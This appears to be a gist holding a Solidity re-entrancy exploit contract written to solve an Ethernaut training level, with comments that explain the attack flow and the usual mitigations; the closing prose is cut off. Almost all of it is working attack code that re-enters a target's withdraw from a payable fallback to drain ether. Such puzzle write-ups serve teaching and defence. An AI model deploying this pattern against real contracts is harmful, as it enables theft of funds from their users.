Created
January 5, 2018 07:46
ReEntrance Exploit
pragma solidity ^0.4.15;

// Proof-of-concept written for a re-entrancy training level (see the gist
// description). It shows the caller's side of the pattern: a payable fallback
// that calls back into another contract while that contract is still in the
// middle of paying out.
//
// Defensive reading: the contract on the other side is not shown here.
// Presumably it sends ether with a gas-forwarding call before it updates its
// own balance bookkeeping -- TODO confirm against the level's source. The usual
// mitigations are to update state before any external call
// (checks-effects-interactions) and/or to guard payout functions with a
// re-entrancy lock.
contract ReentranceExploit {
    // One-shot flag: set by launch_attack(), cleared by the fallback.
    bool public attackModeIsOn = false;
    // Address every low-level call below is sent to; set by deposit().
    address public vulnerable_contract;
    // Deployer of this contract; recorded once in the constructor.
    address public owner;
    // Amount forwarded by deposit() and passed as the argument in later calls.
    uint public withdrawValue;

    // Constructor (pre-0.4.22 style: a function named after the contract).
    function ReentranceExploit() public {
        owner = msg.sender;
    }

    // Records the target and the amount, then forwards msg.value to the target
    // through a low-level call whose selector is derived from
    // "donate(address)", with `owner` as the argument.
    // NOTE(review): there is no caller check; every call overwrites the stored
    // target and amount.
    function deposit(address _vulnerable_contract) public payable {
        withdrawValue = msg.value;
        vulnerable_contract = _vulnerable_contract;

        bytes4 donateSelector = bytes4(keccak256("donate(address)"));
        // require() reverts the whole transaction if the low-level call fails.
        require(_vulnerable_contract.call.value(msg.value)(donateSelector, owner));
    }

    // Arms the one-shot flag and issues the first low-level call, using a
    // selector derived from "withdraw(uint)" and the stored amount.
    // If the target sends ether back during that call, the fallback below runs.
    function launch_attack() public {
        attackModeIsOn = true;

        bytes4 withdrawSelector = bytes4(keccak256("withdraw(uint)"));
        require(vulnerable_contract.call(withdrawSelector, withdrawValue));
    }

    // Payable fallback: runs whenever this contract receives ether or is called
    // with an unknown selector.
    function () public payable {
        // The flag is cleared before calling out so the nested call happens
        // only once; without it the target and this fallback would keep
        // calling each other.
        if (!attackModeIsOn) {
            return;
        }
        attackModeIsOn = false;

        bytes4 withdrawSelector = bytes4(keccak256("withdraw(uint)"));
        require(vulnerable_contract.call(withdrawSelector, withdrawValue));
    }

    // Destroys this contract and sends its whole balance to `owner`.
    // `suicide` is the older alias of `selfdestruct`.
    // NOTE(review): there is no caller check, so any account can trigger the
    // destruction; the balance still goes to `owner`.
    function get_money() public {
        suicide(owner);
    }
}
This is an attempt to solve the Ethernaut puzzle : https://ethernaut.zeppelin.solutions/level/0xf70706db003e94cfe4b5e27ffd891d5c81b39488
It is based on https://github.com/trailofbits/not-so-smart-contracts/blob/master/reentrancy/ReentrancyExploit.sol but using the correct function methodIds:
From a different account than the one I used to deploy the puzzle instance: